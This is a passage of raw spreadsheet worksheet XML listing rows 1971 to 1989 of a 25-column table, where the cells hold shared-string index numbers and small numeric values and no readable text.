        <v>930</v>
      </c>
      <c r="W1971" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X1971" s="12">
        <v>2</v>
      </c>
      <c r="Y1971" s="12" t="s">
        <v>14211</v>
      </c>
    </row>
    <row r="1972" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1972" s="12">
        <v>10181</v>
      </c>
      <c r="B1972" s="12" t="s">
        <v>31217</v>
      </c>
      <c r="D1972" s="12" t="s">
        <v>31209</v>
      </c>
      <c r="E1972" s="12" t="s">
        <v>31429</v>
      </c>
      <c r="F1972" s="12" t="s">
        <v>31202</v>
      </c>
      <c r="G1972" s="12" t="s">
        <v>14216</v>
      </c>
      <c r="H1972" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I1972" s="12" t="s">
        <v>111</v>
      </c>
      <c r="J1972" s="12" t="s">
        <v>1299</v>
      </c>
      <c r="K1972" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L1972" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M1972" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N1972" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O1972" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P1972" s="12" t="s">
        <v>10414</v>
      </c>
      <c r="Q1972" s="12" t="s">
        <v>28307</v>
      </c>
      <c r="R1972" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S1972" s="12" t="s">
        <v>14217</v>
      </c>
      <c r="T1972" s="12" t="s">
        <v>14218</v>
      </c>
      <c r="U1972" s="12" t="s">
        <v>14219</v>
      </c>
      <c r="V1972" s="12" t="s">
        <v>10314</v>
      </c>
      <c r="W1972" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X1972" s="12">
        <v>3</v>
      </c>
      <c r="Y1972" s="12" t="s">
        <v>14220</v>
      </c>
    </row>
    <row r="1973" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1973" s="12">
        <v>10185</v>
      </c>
      <c r="B1973" s="12" t="s">
        <v>28232</v>
      </c>
      <c r="D1973" s="12" t="s">
        <v>30163</v>
      </c>
      <c r="E1973" s="12" t="s">
        <v>31427</v>
      </c>
      <c r="F1973" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="G1973" s="12" t="s">
        <v>14225</v>
      </c>
      <c r="H1973" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I1973" s="12" t="s">
        <v>13</v>
      </c>
      <c r="J1973" s="12" t="s">
        <v>14</v>
      </c>
      <c r="K1973" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L1973" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M1973" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N1973" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O1973" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P1973" s="12" t="s">
        <v>14226</v>
      </c>
      <c r="Q1973" s="12" t="s">
        <v>28336</v>
      </c>
      <c r="R1973" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S1973" s="12" t="s">
        <v>14227</v>
      </c>
      <c r="T1973" s="12" t="s">
        <v>2379</v>
      </c>
      <c r="U1973" s="12" t="s">
        <v>14228</v>
      </c>
      <c r="V1973" s="12" t="s">
        <v>13290</v>
      </c>
      <c r="W1973" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X1973" s="12">
        <v>1</v>
      </c>
      <c r="Y1973" s="12" t="s">
        <v>14229</v>
      </c>
    </row>
    <row r="1974" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1974" s="12">
        <v>10188</v>
      </c>
      <c r="B1974" s="12" t="s">
        <v>28232</v>
      </c>
      <c r="D1974" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="F1974" s="12" t="s">
        <v>30368</v>
      </c>
      <c r="G1974" s="12" t="s">
        <v>14235</v>
      </c>
      <c r="H1974" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I1974" s="12" t="s">
        <v>22</v>
      </c>
      <c r="J1974" s="12" t="s">
        <v>1724</v>
      </c>
      <c r="K1974" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L1974" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M1974" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N1974" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O1974" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P1974" s="12" t="s">
        <v>14198</v>
      </c>
      <c r="Q1974" s="12" t="s">
        <v>28308</v>
      </c>
      <c r="R1974" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S1974" s="12" t="s">
        <v>14236</v>
      </c>
      <c r="T1974" s="12" t="s">
        <v>2379</v>
      </c>
      <c r="U1974" s="12" t="s">
        <v>14237</v>
      </c>
      <c r="V1974" s="12" t="s">
        <v>11875</v>
      </c>
      <c r="W1974" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X1974" s="12">
        <v>1</v>
      </c>
      <c r="Y1974" s="12" t="s">
        <v>14238</v>
      </c>
    </row>
    <row r="1975" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1975" s="12">
        <v>10189</v>
      </c>
      <c r="B1975" s="12" t="s">
        <v>30878</v>
      </c>
      <c r="D1975" s="12" t="s">
        <v>30913</v>
      </c>
      <c r="E1975" s="12" t="s">
        <v>31427</v>
      </c>
      <c r="F1975" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="G1975" s="12" t="s">
        <v>14239</v>
      </c>
      <c r="H1975" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I1975" s="12" t="s">
        <v>13</v>
      </c>
      <c r="J1975" s="12" t="s">
        <v>3068</v>
      </c>
      <c r="K1975" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L1975" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M1975" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N1975" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O1975" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P1975" s="12" t="s">
        <v>14240</v>
      </c>
      <c r="Q1975" s="12">
        <v>2.5</v>
      </c>
      <c r="R1975" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S1975" s="12" t="s">
        <v>14241</v>
      </c>
      <c r="T1975" s="12" t="s">
        <v>2379</v>
      </c>
      <c r="U1975" s="12" t="s">
        <v>14242</v>
      </c>
      <c r="V1975" s="12" t="s">
        <v>70</v>
      </c>
      <c r="W1975" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X1975" s="12">
        <v>1</v>
      </c>
      <c r="Y1975" s="12" t="s">
        <v>14243</v>
      </c>
    </row>
    <row r="1976" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1976" s="12">
        <v>10191</v>
      </c>
      <c r="B1976" s="12" t="s">
        <v>30917</v>
      </c>
      <c r="C1976" s="12" t="s">
        <v>30915</v>
      </c>
      <c r="D1976" s="12" t="s">
        <v>30913</v>
      </c>
      <c r="E1976" s="12" t="s">
        <v>31429</v>
      </c>
      <c r="F1976" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="G1976" s="12" t="s">
        <v>14244</v>
      </c>
      <c r="H1976" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I1976" s="12" t="s">
        <v>111</v>
      </c>
      <c r="J1976" s="12" t="s">
        <v>28</v>
      </c>
      <c r="K1976" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L1976" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M1976" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N1976" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O1976" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P1976" s="12" t="s">
        <v>14245</v>
      </c>
      <c r="Q1976" s="12">
        <v>2.5</v>
      </c>
      <c r="R1976" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S1976" s="12" t="s">
        <v>14246</v>
      </c>
      <c r="T1976" s="12" t="s">
        <v>2379</v>
      </c>
      <c r="U1976" s="12" t="s">
        <v>14247</v>
      </c>
      <c r="V1976" s="12" t="s">
        <v>323</v>
      </c>
      <c r="W1976" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X1976" s="12">
        <v>3</v>
      </c>
      <c r="Y1976" s="12" t="s">
        <v>14248</v>
      </c>
    </row>
    <row r="1977" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1977" s="12">
        <v>10201</v>
      </c>
      <c r="B1977" s="12" t="s">
        <v>28356</v>
      </c>
      <c r="C1977" s="12" t="s">
        <v>28357</v>
      </c>
      <c r="D1977" s="12" t="s">
        <v>28348</v>
      </c>
      <c r="E1977" s="12" t="s">
        <v>31442</v>
      </c>
      <c r="F1977" s="12" t="s">
        <v>29768</v>
      </c>
      <c r="G1977" s="12" t="s">
        <v>14263</v>
      </c>
      <c r="H1977" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I1977" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J1977" s="12" t="s">
        <v>65</v>
      </c>
      <c r="K1977" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L1977" s="12" t="s">
        <v>4026</v>
      </c>
      <c r="M1977" s="12" t="s">
        <v>31585</v>
      </c>
      <c r="N1977" s="12" t="s">
        <v>31595</v>
      </c>
      <c r="O1977" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P1977" s="12" t="s">
        <v>14264</v>
      </c>
      <c r="Q1977" s="12" t="s">
        <v>28307</v>
      </c>
      <c r="R1977" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S1977" s="12" t="s">
        <v>14265</v>
      </c>
      <c r="T1977" s="12" t="s">
        <v>14266</v>
      </c>
      <c r="U1977" s="12" t="s">
        <v>14267</v>
      </c>
      <c r="V1977" s="12" t="s">
        <v>1245</v>
      </c>
      <c r="W1977" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X1977" s="12">
        <v>15</v>
      </c>
      <c r="Y1977" s="12" t="s">
        <v>14268</v>
      </c>
    </row>
    <row r="1978" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1978" s="12">
        <v>10208</v>
      </c>
      <c r="B1978" s="12" t="s">
        <v>28232</v>
      </c>
      <c r="D1978" s="12" t="s">
        <v>30841</v>
      </c>
      <c r="E1978" s="12" t="s">
        <v>31451</v>
      </c>
      <c r="F1978" s="12" t="s">
        <v>30152</v>
      </c>
      <c r="G1978" s="12" t="s">
        <v>14270</v>
      </c>
      <c r="H1978" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I1978" s="12" t="s">
        <v>22</v>
      </c>
      <c r="J1978" s="12" t="s">
        <v>270</v>
      </c>
      <c r="K1978" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L1978" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M1978" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N1978" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O1978" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P1978" s="12" t="s">
        <v>14198</v>
      </c>
      <c r="Q1978" s="12" t="s">
        <v>28308</v>
      </c>
      <c r="R1978" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S1978" s="12" t="s">
        <v>14271</v>
      </c>
      <c r="T1978" s="12" t="s">
        <v>2379</v>
      </c>
      <c r="U1978" s="12" t="s">
        <v>14272</v>
      </c>
      <c r="V1978" s="12" t="s">
        <v>274</v>
      </c>
      <c r="W1978" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X1978" s="12">
        <v>1</v>
      </c>
      <c r="Y1978" s="12" t="s">
        <v>14273</v>
      </c>
    </row>
    <row r="1979" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1979" s="12">
        <v>10209</v>
      </c>
      <c r="B1979" s="12" t="s">
        <v>28232</v>
      </c>
      <c r="D1979" s="12" t="s">
        <v>30913</v>
      </c>
      <c r="E1979" s="12" t="s">
        <v>31427</v>
      </c>
      <c r="F1979" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="G1979" s="12" t="s">
        <v>14274</v>
      </c>
      <c r="H1979" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I1979" s="12" t="s">
        <v>35</v>
      </c>
      <c r="J1979" s="12" t="s">
        <v>277</v>
      </c>
      <c r="K1979" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L1979" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M1979" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N1979" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O1979" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P1979" s="12" t="s">
        <v>14031</v>
      </c>
      <c r="Q1979" s="12" t="s">
        <v>28308</v>
      </c>
      <c r="R1979" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S1979" s="12" t="s">
        <v>14275</v>
      </c>
      <c r="T1979" s="12" t="s">
        <v>2379</v>
      </c>
      <c r="U1979" s="12" t="s">
        <v>14276</v>
      </c>
      <c r="V1979" s="12" t="s">
        <v>93</v>
      </c>
      <c r="W1979" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X1979" s="12">
        <v>3</v>
      </c>
      <c r="Y1979" s="12" t="s">
        <v>14277</v>
      </c>
    </row>
    <row r="1980" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1980" s="12">
        <v>10210</v>
      </c>
      <c r="B1980" s="12" t="s">
        <v>28232</v>
      </c>
      <c r="D1980" s="12" t="s">
        <v>28348</v>
      </c>
      <c r="E1980" s="12" t="s">
        <v>31427</v>
      </c>
      <c r="F1980" s="12" t="s">
        <v>28348</v>
      </c>
      <c r="G1980" s="12" t="s">
        <v>14278</v>
      </c>
      <c r="H1980" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I1980" s="12" t="s">
        <v>13</v>
      </c>
      <c r="J1980" s="12" t="s">
        <v>3068</v>
      </c>
      <c r="K1980" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L1980" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M1980" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N1980" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O1980" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P1980" s="12" t="s">
        <v>14279</v>
      </c>
      <c r="Q1980" s="12" t="s">
        <v>28308</v>
      </c>
      <c r="R1980" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S1980" s="12" t="s">
        <v>14280</v>
      </c>
      <c r="T1980" s="12" t="s">
        <v>2379</v>
      </c>
      <c r="U1980" s="12" t="s">
        <v>14281</v>
      </c>
      <c r="V1980" s="12" t="s">
        <v>70</v>
      </c>
      <c r="W1980" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X1980" s="12">
        <v>4</v>
      </c>
      <c r="Y1980" s="12" t="s">
        <v>14282</v>
      </c>
    </row>
    <row r="1981" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1981" s="12">
        <v>10218</v>
      </c>
      <c r="B1981" s="12" t="s">
        <v>28232</v>
      </c>
      <c r="D1981" s="12" t="s">
        <v>30841</v>
      </c>
      <c r="E1981" s="12" t="s">
        <v>31451</v>
      </c>
      <c r="F1981" s="12" t="s">
        <v>30152</v>
      </c>
      <c r="G1981" s="12" t="s">
        <v>14287</v>
      </c>
      <c r="H1981" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I1981" s="12" t="s">
        <v>22</v>
      </c>
      <c r="J1981" s="12" t="s">
        <v>23</v>
      </c>
      <c r="K1981" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L1981" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M1981" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N1981" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O1981" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P1981" s="12" t="s">
        <v>14288</v>
      </c>
      <c r="Q1981" s="12" t="s">
        <v>28308</v>
      </c>
      <c r="R1981" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S1981" s="12" t="s">
        <v>14289</v>
      </c>
      <c r="T1981" s="12" t="s">
        <v>2379</v>
      </c>
      <c r="U1981" s="12" t="s">
        <v>14290</v>
      </c>
      <c r="V1981" s="12" t="s">
        <v>3738</v>
      </c>
      <c r="W1981" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X1981" s="12">
        <v>1</v>
      </c>
      <c r="Y1981" s="12" t="s">
        <v>14291</v>
      </c>
    </row>
    <row r="1982" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1982" s="12">
        <v>10222</v>
      </c>
      <c r="B1982" s="12" t="s">
        <v>31217</v>
      </c>
      <c r="D1982" s="12" t="s">
        <v>31209</v>
      </c>
      <c r="E1982" s="12" t="s">
        <v>31442</v>
      </c>
      <c r="F1982" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="G1982" s="12" t="s">
        <v>14292</v>
      </c>
      <c r="H1982" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I1982" s="12" t="s">
        <v>51</v>
      </c>
      <c r="J1982" s="12" t="s">
        <v>9219</v>
      </c>
      <c r="K1982" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L1982" s="12" t="s">
        <v>11546</v>
      </c>
      <c r="M1982" s="12" t="s">
        <v>31583</v>
      </c>
      <c r="N1982" s="12" t="s">
        <v>31596</v>
      </c>
      <c r="O1982" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P1982" s="12" t="s">
        <v>10414</v>
      </c>
      <c r="Q1982" s="12" t="s">
        <v>28307</v>
      </c>
      <c r="R1982" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S1982" s="12" t="s">
        <v>14293</v>
      </c>
      <c r="T1982" s="12">
        <v>10002000</v>
      </c>
      <c r="U1982" s="12" t="s">
        <v>14294</v>
      </c>
      <c r="V1982" s="12" t="s">
        <v>3725</v>
      </c>
      <c r="W1982" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X1982" s="12">
        <v>16</v>
      </c>
      <c r="Y1982" s="12" t="s">
        <v>14295</v>
      </c>
    </row>
    <row r="1983" spans="1:25" s="13" customFormat="1" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1983" s="13">
        <v>10224</v>
      </c>
      <c r="B1983" s="13" t="s">
        <v>30683</v>
      </c>
      <c r="C1983" s="13" t="s">
        <v>28466</v>
      </c>
      <c r="D1983" s="13" t="s">
        <v>28348</v>
      </c>
      <c r="E1983" s="13" t="s">
        <v>31442</v>
      </c>
      <c r="F1983" s="13" t="s">
        <v>28347</v>
      </c>
      <c r="G1983" s="13" t="s">
        <v>14296</v>
      </c>
      <c r="H1983" s="13" t="s">
        <v>21</v>
      </c>
      <c r="I1983" s="13" t="s">
        <v>51</v>
      </c>
      <c r="J1983" s="13" t="s">
        <v>52</v>
      </c>
      <c r="K1983" s="13" t="s">
        <v>37</v>
      </c>
      <c r="L1983" s="13" t="s">
        <v>11536</v>
      </c>
      <c r="M1983" s="13" t="s">
        <v>31582</v>
      </c>
      <c r="N1983" s="13" t="s">
        <v>31582</v>
      </c>
      <c r="O1983" s="13" t="s">
        <v>31589</v>
      </c>
      <c r="P1983" s="13" t="s">
        <v>10414</v>
      </c>
      <c r="Q1983" s="13" t="s">
        <v>28307</v>
      </c>
      <c r="R1983" s="13" t="s">
        <v>17</v>
      </c>
      <c r="S1983" s="13" t="s">
        <v>14297</v>
      </c>
      <c r="T1983" s="13" t="s">
        <v>14298</v>
      </c>
      <c r="U1983" s="13" t="s">
        <v>14299</v>
      </c>
      <c r="V1983" s="13" t="s">
        <v>3399</v>
      </c>
      <c r="W1983" s="13" t="s">
        <v>14300</v>
      </c>
      <c r="X1983" s="13">
        <v>28</v>
      </c>
      <c r="Y1983" s="13" t="s">
        <v>14301</v>
      </c>
    </row>
    <row r="1984" spans="1:25" s="14" customFormat="1" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1984" s="12">
        <v>10232</v>
      </c>
      <c r="B1984" s="12" t="s">
        <v>28232</v>
      </c>
      <c r="C1984" s="12"/>
      <c r="D1984" s="12" t="s">
        <v>28348</v>
      </c>
      <c r="E1984" s="12" t="s">
        <v>31451</v>
      </c>
      <c r="F1984" s="12" t="s">
        <v>28348</v>
      </c>
      <c r="G1984" s="12" t="s">
        <v>14313</v>
      </c>
      <c r="H1984" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I1984" s="12" t="s">
        <v>22</v>
      </c>
      <c r="J1984" s="12" t="s">
        <v>1724</v>
      </c>
      <c r="K1984" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L1984" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M1984" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N1984" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O1984" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P1984" s="12" t="s">
        <v>14198</v>
      </c>
      <c r="Q1984" s="12" t="s">
        <v>28308</v>
      </c>
      <c r="R1984" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S1984" s="12" t="s">
        <v>14314</v>
      </c>
      <c r="T1984" s="12" t="s">
        <v>14315</v>
      </c>
      <c r="U1984" s="12" t="s">
        <v>14316</v>
      </c>
      <c r="V1984" s="12" t="s">
        <v>11875</v>
      </c>
      <c r="W1984" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X1984" s="12">
        <v>10</v>
      </c>
      <c r="Y1984" s="12" t="s">
        <v>14317</v>
      </c>
    </row>
    <row r="1985" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1985" s="12">
        <v>10234</v>
      </c>
      <c r="B1985" s="12" t="s">
        <v>28232</v>
      </c>
      <c r="D1985" s="12" t="s">
        <v>29977</v>
      </c>
      <c r="E1985" s="12" t="s">
        <v>31442</v>
      </c>
      <c r="F1985" s="12" t="s">
        <v>29969</v>
      </c>
      <c r="G1985" s="12" t="s">
        <v>14318</v>
      </c>
      <c r="H1985" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I1985" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J1985" s="12" t="s">
        <v>128</v>
      </c>
      <c r="K1985" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L1985" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M1985" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N1985" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O1985" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P1985" s="12" t="s">
        <v>14198</v>
      </c>
      <c r="Q1985" s="12" t="s">
        <v>28308</v>
      </c>
      <c r="R1985" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S1985" s="12" t="s">
        <v>14319</v>
      </c>
      <c r="T1985" s="12" t="s">
        <v>2379</v>
      </c>
      <c r="U1985" s="12" t="s">
        <v>14320</v>
      </c>
      <c r="V1985" s="12" t="s">
        <v>3260</v>
      </c>
      <c r="W1985" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X1985" s="12">
        <v>2</v>
      </c>
      <c r="Y1985" s="12" t="s">
        <v>14321</v>
      </c>
    </row>
    <row r="1986" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1986" s="12">
        <v>10238</v>
      </c>
      <c r="B1986" s="12" t="s">
        <v>29948</v>
      </c>
      <c r="C1986" s="12" t="s">
        <v>28406</v>
      </c>
      <c r="D1986" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="E1986" s="12" t="s">
        <v>31429</v>
      </c>
      <c r="F1986" s="12" t="s">
        <v>29953</v>
      </c>
      <c r="G1986" s="12" t="s">
        <v>14327</v>
      </c>
      <c r="H1986" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I1986" s="12" t="s">
        <v>111</v>
      </c>
      <c r="J1986" s="12" t="s">
        <v>28</v>
      </c>
      <c r="K1986" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L1986" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M1986" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N1986" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O1986" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P1986" s="12" t="s">
        <v>14328</v>
      </c>
      <c r="Q1986" s="12" t="s">
        <v>28308</v>
      </c>
      <c r="R1986" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S1986" s="12" t="s">
        <v>14329</v>
      </c>
      <c r="T1986" s="12" t="s">
        <v>2379</v>
      </c>
      <c r="U1986" s="12" t="s">
        <v>14330</v>
      </c>
      <c r="V1986" s="12" t="s">
        <v>323</v>
      </c>
      <c r="W1986" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X1986" s="12">
        <v>10</v>
      </c>
      <c r="Y1986" s="12" t="s">
        <v>14331</v>
      </c>
    </row>
    <row r="1987" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1987" s="12">
        <v>10242</v>
      </c>
      <c r="B1987" s="12" t="s">
        <v>29955</v>
      </c>
      <c r="C1987" s="12" t="s">
        <v>28391</v>
      </c>
      <c r="D1987" s="12" t="s">
        <v>29981</v>
      </c>
      <c r="E1987" s="12" t="s">
        <v>31427</v>
      </c>
      <c r="F1987" s="12" t="s">
        <v>29950</v>
      </c>
      <c r="G1987" s="12" t="s">
        <v>14333</v>
      </c>
      <c r="H1987" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I1987" s="12" t="s">
        <v>13</v>
      </c>
      <c r="J1987" s="12" t="s">
        <v>258</v>
      </c>
      <c r="K1987" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L1987" s="12" t="s">
        <v>11546</v>
      </c>
      <c r="M1987" s="12" t="s">
        <v>31583</v>
      </c>
      <c r="N1987" s="12" t="s">
        <v>31596</v>
      </c>
      <c r="O1987" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P1987" s="12" t="s">
        <v>14288</v>
      </c>
      <c r="Q1987" s="12" t="s">
        <v>28308</v>
      </c>
      <c r="R1987" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S1987" s="12" t="s">
        <v>14334</v>
      </c>
      <c r="T1987" s="12" t="s">
        <v>10763</v>
      </c>
      <c r="U1987" s="12" t="s">
        <v>14335</v>
      </c>
      <c r="V1987" s="12" t="s">
        <v>3984</v>
      </c>
      <c r="W1987" s="12">
        <v>10207</v>
      </c>
      <c r="X1987" s="12">
        <v>13</v>
      </c>
      <c r="Y1987" s="12" t="s">
        <v>14336</v>
      </c>
    </row>
    <row r="1988" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1988" s="12">
        <v>10245</v>
      </c>
      <c r="B1988" s="12" t="s">
        <v>31217</v>
      </c>
      <c r="D1988" s="12" t="s">
        <v>31209</v>
      </c>
      <c r="E1988" s="12" t="s">
        <v>31442</v>
      </c>
      <c r="F1988" s="12" t="s">
        <v>31210</v>
      </c>
      <c r="G1988" s="12" t="s">
        <v>14337</v>
      </c>
      <c r="H1988" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I1988" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J1988" s="12" t="s">
        <v>1446</v>
      </c>
      <c r="K1988" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L1988" s="12" t="s">
        <v>11546</v>
      </c>
      <c r="M1988" s="12" t="s">
        <v>31583</v>
      </c>
      <c r="N1988" s="12" t="s">
        <v>31596</v>
      </c>
      <c r="O1988" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P1988" s="12" t="s">
        <v>14288</v>
      </c>
      <c r="Q1988" s="12" t="s">
        <v>28308</v>
      </c>
      <c r="R1988" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S1988" s="12" t="s">
        <v>14338</v>
      </c>
      <c r="T1988" s="12" t="s">
        <v>8608</v>
      </c>
      <c r="U1988" s="12" t="s">
        <v>9750</v>
      </c>
      <c r="V1988" s="12" t="s">
        <v>5074</v>
      </c>
      <c r="W1988" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X1988" s="12">
        <v>39</v>
      </c>
      <c r="Y1988" s="12" t="s">
        <v>14339</v>
      </c>
    </row>
    <row r="1989" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1989" s="12">
        <v>10246</v>
      </c>
      <c r="B1989" s="12" t="s">
        <v>31217</v>
      </c>
      <c r="D1989" s="12" t="s">
        <v>31209</v>
      </c>
      <c r="E1989" s="12" t="s">
        <v>31425</v>
      </c>
      <c r="F1989" s="12" t="s">
        <v>31203</v>
      </c>
      <c r="G1989" s="12" t="s">
        <v>14340</v>
      </c>
      <c r="H1989" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I1989" s="12" t="s">
        <v>14196</v>
      </c>
      <c r="J1989" s="12" t="s">
        <v>14197</v>
      </c>
      <c r="K1989" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L1989" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M1989" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N1989" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O1989" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P1989" s="12" t="s">
        <v>14288</v>
      </c>
      <c r="Q1989" s="12" t="s">
        <v>28308</v>
      </c>
      <c r="R1989" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S1989" s="12" t="s">
        <v>14341</v>
      </c>
      <c r="T1989" s="12" t="s">
        <v>1651</v>
      </c>
